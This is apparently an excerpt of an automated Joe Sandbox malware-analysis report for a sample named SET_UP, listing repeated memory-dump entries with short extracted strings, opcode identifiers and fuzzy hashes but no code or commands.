                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8h$TU
                                                                                                  • API String ID: 0-1400047777
                                                                                                  • Opcode ID: a125bb40ab51c79feeedc4b16736c7589bb39fbb7798d16ad3bac1a2e6ffdb4f
                                                                                                  • Instruction ID: 8c0755553d8503b8e7814350f8a643339a1bc45495e697e21ca8d5778c75f02a
                                                                                                  • Opcode Fuzzy Hash: a125bb40ab51c79feeedc4b16736c7589bb39fbb7798d16ad3bac1a2e6ffdb4f
                                                                                                  • Instruction Fuzzy Hash: F7B1CBB05183108BD724DF29C89276BB7F5FFD2724F088A2CE8995B391E7749905CB86
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: t{$}z
                                                                                                  • API String ID: 0-3262105078
                                                                                                  • Opcode ID: b1e2dee66ad8e13eb65fad1440ff059eed7a4b762647dd3446ec512d0ad034cd
                                                                                                  • Instruction ID: 12700cd8dee31246d82c27baae7341b5d807183536f416bdcd7db3c7b74453ba
                                                                                                  • Opcode Fuzzy Hash: b1e2dee66ad8e13eb65fad1440ff059eed7a4b762647dd3446ec512d0ad034cd
                                                                                                  • Instruction Fuzzy Hash: 5991EE716183518BD324CF29C4A176BB7F5FF99758F188A2CE4CA4B790E3788941CB46
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 7$gfff
                                                                                                  • API String ID: 0-3777064726
                                                                                                  • Opcode ID: 22ff1f44a4800983096c3d41fa206cdd258863b17f46c11d0d57c7184d25335b
                                                                                                  • Instruction ID: 50beb3a4eae255f31c3f4359020925cf6ec1f82095d792faff8ce6dd9d18a61d
                                                                                                  • Opcode Fuzzy Hash: 22ff1f44a4800983096c3d41fa206cdd258863b17f46c11d0d57c7184d25335b
                                                                                                  • Instruction Fuzzy Hash: 49916973A087118BD328CF28CC527AAB7D6EBC5314F19863DD496DB3D4EB7899058781
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ./$;fjT
                                                                                                  • API String ID: 0-1479638378
                                                                                                  • Opcode ID: 42152f34d3b221485527a493fa1bb10c124176803075ebd35251441b816243b0
                                                                                                  • Instruction ID: 65575324eca61b3b61c84d0b18b2c8b5517d9ec338d011719c806bbb1f9f9de7
                                                                                                  • Opcode Fuzzy Hash: 42152f34d3b221485527a493fa1bb10c124176803075ebd35251441b816243b0
                                                                                                  • Instruction Fuzzy Hash: 28713871A0A3008BD315CF24C9A176BBBF2EFD2315F08A65CE8D54B395E7798806C796
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8c\]$96
                                                                                                  • API String ID: 0-2994620949
                                                                                                  • Opcode ID: 4f885f2dc1020b6a133ae1357f9489c173c2ecb254d29b31cccfde31f5923aa0
                                                                                                  • Instruction ID: 6961d2ececcab48f1df0ee4dbf92de2a46a9fc39a55c65643edfdb840a80f83b
                                                                                                  • Opcode Fuzzy Hash: 4f885f2dc1020b6a133ae1357f9489c173c2ecb254d29b31cccfde31f5923aa0
                                                                                                  • Instruction Fuzzy Hash: 1181F2B61483059BC714CFA8C8A13ABBBF1FF91314F08891CE4D94B390E3B89A05C756
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2$m
                                                                                                  • API String ID: 0-440734895
                                                                                                  • Opcode ID: fccac671f792c75b9848c09ce8a4190f44dc5b17b480188e2123a7121e826bf6
                                                                                                  • Instruction ID: 8ff155fe7e56b9d1a59400b5a7127f493d67dd704f4d25d13fa104f1db24aa69
                                                                                                  • Opcode Fuzzy Hash: fccac671f792c75b9848c09ce8a4190f44dc5b17b480188e2123a7121e826bf6
                                                                                                  • Instruction Fuzzy Hash: 7381F77260C7808BD7148A39C8953EFABC6ABD5334F298B7DD5E9C72C2D67D85054306
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  • Opcode ID: d108c75df72d27925cc82a9c195be03150b8c4d9555d38a5f2adf3cdeae384bf
                                                                                                  • Instruction ID: 9aef257731ed2abd845fbb67e2c9aefcb96adb73d5d3627fe39e80eff5d47d03
                                                                                                  • Opcode Fuzzy Hash: d108c75df72d27925cc82a9c195be03150b8c4d9555d38a5f2adf3cdeae384bf
                                                                                                  • Instruction Fuzzy Hash: 0CC20672A04B918FC725CA3CC85135DBFE2AB96324F19876CD4EA9B3D2D6359C02C791
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: x$|UIM
                                                                                                  • API String ID: 0-12230101
                                                                                                  • Opcode ID: 7764a5b7f9bedd9914a64d32db948c775b8d3e37f2d2380acb41d126c3870c66
                                                                                                  • Instruction ID: 210215aef5a1e82980fb481fb2ee306d5ea32b31124e5a817348acaa4d90f082
                                                                                                  • Opcode Fuzzy Hash: 7764a5b7f9bedd9914a64d32db948c775b8d3e37f2d2380acb41d126c3870c66
                                                                                                  • Instruction Fuzzy Hash: 8C5126726483508BD710CF69C99175FFFE2ABD6314F49592CE0C5EB292C7B9C8098B46
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ur$c
                                                                                                  • API String ID: 0-3789551904
                                                                                                  • Opcode ID: ba4e14552498b7dae6c8c95808fb0d667936efa269ac515293f6bb8b6acd397f
                                                                                                  • Instruction ID: 56e7099d46a547e77242015693edade251454e2abb719c7bf8c7ba39a3580d84
                                                                                                  • Opcode Fuzzy Hash: ba4e14552498b7dae6c8c95808fb0d667936efa269ac515293f6bb8b6acd397f
                                                                                                  • Instruction Fuzzy Hash: 3A21D3763583029FC318CF29C89075BBBA3ABC6300F19C92CE69587291D7758505CB4A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: DE$AC
                                                                                                  • API String ID: 0-456299904
                                                                                                  • Opcode ID: 7a4c6d0e8b993f705ea39a44acb8f14096dc4255c4a26ce538f02ca19562ac97
                                                                                                  • Instruction ID: 007a12dfecde1c99e38aac6b94c38e3b53a9a3745ef4ecc875a82e271a748c5f
                                                                                                  • Opcode Fuzzy Hash: 7a4c6d0e8b993f705ea39a44acb8f14096dc4255c4a26ce538f02ca19562ac97
                                                                                                  • Instruction Fuzzy Hash: AB1190B56193919FD300CFAACC9035BBBE16BDA700F28891DE0D59B395CB749905CF8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 30
                                                                                                  • API String ID: 0-2473281379
                                                                                                  • Opcode ID: f0753be82ab15e142b6cecdf8e298b445531a0a421dfd60391e55569f7bc37c0
                                                                                                  • Instruction ID: 55c4599122356ad955a2e270f3977244d441f2e44d5ec1a5f9073ee14dcf4e25
                                                                                                  • Opcode Fuzzy Hash: f0753be82ab15e142b6cecdf8e298b445531a0a421dfd60391e55569f7bc37c0
                                                                                                  • Instruction Fuzzy Hash: B5C1EBB25183508BD724CF28C952BABB7F5FF92354F088A1CE5CA8B391E7798905C752
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: NP,?
                                                                                                  • API String ID: 0-3110377521
                                                                                                  • Opcode ID: 902d8d67efe829309bf354502a3f6c70718930b6f0ff6b6f530c2f09f83858da
                                                                                                  • Instruction ID: 62df654994ffc9169b030379ffae04180c66e4d2e2d084f5a1d54cab381a1342
                                                                                                  • Opcode Fuzzy Hash: 902d8d67efe829309bf354502a3f6c70718930b6f0ff6b6f530c2f09f83858da
                                                                                                  • Instruction Fuzzy Hash: A3B122766083009BD714EF25CC90A2BB7AAEBC5724F159A3CE89957391F731EC05CB92
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: :
                                                                                                  • API String ID: 0-4131208728
                                                                                                  • Opcode ID: b86c399ee6b413cfa08a208ba9a1ef697d35bba9a27fb76adb0c175c39e66afe
                                                                                                  • Instruction ID: 64f19e98e90f718d5df5ee27f467c5506df90fee66e6298378e66a673f25017f
                                                                                                  • Opcode Fuzzy Hash: b86c399ee6b413cfa08a208ba9a1ef697d35bba9a27fb76adb0c175c39e66afe
                                                                                                  • Instruction Fuzzy Hash: 5DA11572A083058BD7189F29CCA237B77E1EF95324F18992CE4C68B291F778D905C752
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6701
                                                                                                  • API String ID: 0-1538833853
                                                                                                  • Opcode ID: 49412179f5f60bf70dc9edcd13d2846cd2816aff445c9dd9a89464ff20814ccb
                                                                                                  • Instruction ID: babbaf8ede5387a3173bd21c9ea298121b29ccb652a352d063e4391566dfeb7b
                                                                                                  • Opcode Fuzzy Hash: 49412179f5f60bf70dc9edcd13d2846cd2816aff445c9dd9a89464ff20814ccb
                                                                                                  • Instruction Fuzzy Hash: 14A1D2316087019BCB15CF2DC890B6BB7E5EFD9724F19892DE895472A1E7709D09CB82
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: VWPQ
                                                                                                  • API String ID: 0-428897
                                                                                                  • Opcode ID: c559dd1a48bbc4c836573ab72f1edd7e29c4642e02d16dbc80371208500bf0cb
                                                                                                  • Instruction ID: 11dd50529ef7f54021918d4c64116cca39cf8c2dbcaa5045e9d203e11a7aaac7
                                                                                                  • Opcode Fuzzy Hash: c559dd1a48bbc4c836573ab72f1edd7e29c4642e02d16dbc80371208500bf0cb
                                                                                                  • Instruction Fuzzy Hash: 81A10532A083108BDB14CF29C85076BB7E6ABD5324F19CA3DE8999B2D1DB75DC058782
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3019521637
                                                                                                  • Opcode ID: dc8872ccb8ea0bb4c0c1d411a27202580a8043d12bc70bf5ae6f49afc3468e7d
                                                                                                  • Instruction ID: 7c2748ddd85f0a5db0c1854b50652773e2a2a2d0cec1b47e185500f14719513e
                                                                                                  • Opcode Fuzzy Hash: dc8872ccb8ea0bb4c0c1d411a27202580a8043d12bc70bf5ae6f49afc3468e7d
                                                                                                  • Instruction Fuzzy Hash: C5A15E365082614FC715CE29C89036BBBD1ABD6324F19C63DE8F98B3D1D6398D0AD791
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: lm
                                                                                                  • API String ID: 0-3146918833
                                                                                                  • Opcode ID: 08b55f55b7fbca652547e305b604c459cb0673469f4dfaac5d4119e80fae0408
• Instruction ID: 42c3ccabbe78268d3ffe011afd9bcbd012470f86480c0bb40709d43af3b2b836
• Opcode Fuzzy Hash: 08b55f55b7fbca652547e305b604c459cb0673469f4dfaac5d4119e80fae0408
• Instruction Fuzzy Hash: D99125719183118BD724DF28C8A136BB7F1FFD6310F18891DE8969B290E7758904C782

Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID: F
• API String ID: 0-1304234792
• Opcode ID: 4554a1d903e955455cc63279691f4cd5f73c8d16f84e1594a64c926cf237f5d5
• Instruction ID: 158ea0e98495ee8e22fcc5934b94e2fd0d18bb985dd4cd64d7d99d5e3d577c69
• Opcode Fuzzy Hash: 4554a1d903e955455cc63279691f4cd5f73c8d16f84e1594a64c926cf237f5d5
• Instruction Fuzzy Hash: 789149716083908BE329CB79C9A036BBBD2AFD6300F19896DE4D6CB395D679C805C752

Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID: x
• API String ID: 0-2363233923
• Opcode ID: 6d195bce0b62ba26365ac69338ead1d432daa2a853a1a6898ef24983fc01d808
• Instruction ID: 27206c526b6130d89da65bc719e8ac483fb2d8de7fd74024ffe688c94a250672
• Opcode Fuzzy Hash: 6d195bce0b62ba26365ac69338ead1d432daa2a853a1a6898ef24983fc01d808
• Instruction Fuzzy Hash: E881B1A110C3818BD715CF2AC4A476BFFE1AFA2305F1859ADE4D19B282D739C50E8767

Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID: "
• API String ID: 0-123907689
• Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
• Instruction ID: e86b5da4f3b0c159d911ea04bc4b608ed6acc05aa85e1d5af0957960572faf91
• Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
• Instruction Fuzzy Hash: 2A71E673B083158BD724CE28C5A031AB7E6ABC5710F29C93DE89CAB395D334DD459B81

Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: 41b6193c16aec78a00729bed0e7008335838a03a1905580f7cf74927c93696ee
• Instruction ID: 4a696e01808ba41f9c28def9cc9c1cbc4fbb7230339ce9aa847d9406968a0f8a
• Opcode Fuzzy Hash: 41b6193c16aec78a00729bed0e7008335838a03a1905580f7cf74927c93696ee
• Instruction Fuzzy Hash: DBC13E61619FC28EC331CA3C8855797BED26B67230F184B9DE1FA8B3D6D7646002C766

Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID: }{
• API String ID: 0-1817783701
• Opcode ID: e860b77e0501139b6a4164555a1ddff0c37f0726eb10fc4c8e880f61a47f4b68
• Instruction ID: 42df2db643f6d8e1a27f63fd149e5637ba10a189171bd4711a32c04c93da0d54
• Opcode Fuzzy Hash: e860b77e0501139b6a4164555a1ddff0c37f0726eb10fc4c8e880f61a47f4b68
• Instruction Fuzzy Hash: 3971E1B1A413218FDB14CF69C9857AA7FB0FB06314F1A92ACD8656F3A6C7748801CBD5

Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID: _
• API String ID: 0-701932520
• Opcode ID: 68ab464c9ae8510021e38292b2f9b0b12cb037f0258766ee48dbab9bdb5169a2
• Instruction ID: ef07b488ea2bd1de662e0406e66fc3d8f594264ea9ad31434fd3f0fe8f31288c
• Opcode Fuzzy Hash: 68ab464c9ae8510021e38292b2f9b0b12cb037f0258766ee48dbab9bdb5169a2
• Instruction Fuzzy Hash: 5E71085521829049D72CDF7484A3737BAE6DF85308F28D1BEC866CF697E635C503874A

Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID: _
• API String ID: 0-701932520
• Opcode ID: 28104c35ade68066c45c087c91e8d7a336523d5b5ac92248899bcc622d4362f7
• Instruction ID: 2c6a4659598550edf6d7af061711014a4bc898c44a31cb957591ed525f056336
• Opcode Fuzzy Hash: 28104c35ade68066c45c087c91e8d7a336523d5b5ac92248899bcc622d4362f7
• Instruction Fuzzy Hash: 1A61050521819009DB2CDB7485A37377AE69F85308F28D1BFC966CF697E639C603874A

Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID: LMB
• API String ID: 0-2413454374
• Opcode ID: 82135dede13db6c24c7af75a159e69b7836bfff6f69dab46beb4be5ce639ec77
• Instruction ID: 1514ee3e5b668536cb141da98564d7379c031c984fcb56cbebf754cd1ca7a5ca
• Opcode Fuzzy Hash: 82135dede13db6c24c7af75a159e69b7836bfff6f69dab46beb4be5ce639ec77
• Instruction Fuzzy Hash: 2C31FD725087408FE310CF6AD89175BFBE6ABC1328F158A2CE4A09B381DBB98405CF46

Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID: `rb
• API String ID: 0-3097227096
• Opcode ID: 9254cb37cba729031d54dfd2e00d2b55ffc009b232e81c9d6fb51289ef9b5081
• Instruction ID: 385073adc5a7a00d9836258191b91dcb232845ce4535371ecf4c28c81a142467
• Opcode Fuzzy Hash: 9254cb37cba729031d54dfd2e00d2b55ffc009b232e81c9d6fb51289ef9b5081
• Instruction Fuzzy Hash: F021F83270C6504BCB188F2DC46076DB7E2ABC9318F098A5DE9C9A7781D638D9058786

Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: 2ee4c9b6caf6e734b502f14691ddc558aaa28acda75aa4cd9cfd661fcbb44f4a
• Instruction ID: c1b9fb8ef67b9ed85e3691f044ed07e70d24a2fcc6e7bd8a1cdba755dbe0c4fa
• Opcode Fuzzy Hash: 2ee4c9b6caf6e734b502f14691ddc558aaa28acda75aa4cd9cfd661fcbb44f4a
• Instruction Fuzzy Hash: 2221D1715043049FC7249F09D8C166BB7B8EF86324F259A2CFAA847290E37599088BA6

Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID: wq
• API String ID: 0-842961541
• Opcode ID: cfefa764dceb76ed149494bb758a95a71502013e4f938ebc9f588fb553530449
• Instruction ID: ced0d634663ad5664fa8722e941f162726e2e6afcc0c2642b25daa7820f10d42
• Opcode Fuzzy Hash: cfefa764dceb76ed149494bb758a95a71502013e4f938ebc9f588fb553530449
• Instruction Fuzzy Hash: 1A3185B4A00B828BE7258F21C595766FFB0BB12314F249A8CE0865F282D371D084CBC9

Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d6d03fc09d145b0b44e5fae241ded02e5ee3951878581872cab7c66fee444265
• Instruction ID: 6177f34fe708597d6511e55e9eecd5370be4d0f6738115d590d45483634937c0
• Opcode Fuzzy Hash: d6d03fc09d145b0b44e5fae241ded02e5ee3951878581872cab7c66fee444265
• Instruction Fuzzy Hash: FA8216B0515B819FD3A1CF3DC841793BBE9AB5A300F08496EE0EED7342D779A5008B65

Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 30676b045e322eef53236cfafab0dbab0a1c47f3d8ab82d555bc75e413034a75
• Instruction ID: f0fb2b2847b4feeb19f1ca17261718edaefe96fa7bb0f6fde4c43a5e3878dfa8
• Opcode Fuzzy Hash: 30676b045e322eef53236cfafab0dbab0a1c47f3d8ab82d555bc75e413034a75
• Instruction Fuzzy Hash: 0452D3315087458FCB54CF26C0906AABBF1BF89319F198A6DEC995B381D735E889CF81

Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c269ec444ba2dab046672beee3da691587e84de61b40cb6cc5fa3e2af8479134
• Instruction ID: 8a70063becb588763a95efb90d9275d447658702c125539b1887ea01012dc4b5
• Opcode Fuzzy Hash: c269ec444ba2dab046672beee3da691587e84de61b40cb6cc5fa3e2af8479134
• Instruction Fuzzy Hash: 2552F670908B848FE731CB25C4843A7BBE5EB91311F145D6DD9E726BC2DB79A889C701

Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 14a654d98c96d00df03effd76b4d46abdeb0ca33e0ac155c996a6e6c0a4e402f
• Instruction ID: 29e8eb15ccd8de66f57b62684d62f881d0358a4e9697bc142d92a69bd727bd1c
• Opcode Fuzzy Hash: 14a654d98c96d00df03effd76b4d46abdeb0ca33e0ac155c996a6e6c0a4e402f
• Instruction Fuzzy Hash: 8122E632608711CBD725DF1AD8806ABB3E5FFC4316F19892DDDC697285E734A81ACB42

Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: bba18fb96af52512da0dd8ea1a5c94cbe51666f60c9485190944f2c71320ff01
• Instruction ID: 1f7230da3b983838155464b8110a5924d8cf110bbef442a30fa7428ac6104be5
• Opcode Fuzzy Hash: bba18fb96af52512da0dd8ea1a5c94cbe51666f60c9485190944f2c71320ff01
• Instruction Fuzzy Hash: 41322570515F118FC328CF2AC5A052AB7F2BF45311B614A2EDAA787E92D736F849CB10

Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3f39664e76c06927607c1d13ad4f5b6e2925a18c6190f4edc29a3f390167dd84
• Instruction ID: 3c213dd6543d9177c81e10fa789d7ce28c7436b4e70cf9c7a20f3be73a31b539
• Opcode Fuzzy Hash: 3f39664e76c06927607c1d13ad4f5b6e2925a18c6190f4edc29a3f390167dd84
• Instruction Fuzzy Hash: F2226D61508BC18ED325CA3C8849356BE926B67238F2CC79DE4F94F7E3C36695078762

Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
• Instruction ID: 8ab1363860cc64748efda259fb493640ddf366752500a998caf7612a098de49a
• Opcode Fuzzy Hash: 72ef3389d17b5c2d7356fca882b754ee43f181ee348d4ceda7fd19fbe0bcaa8a
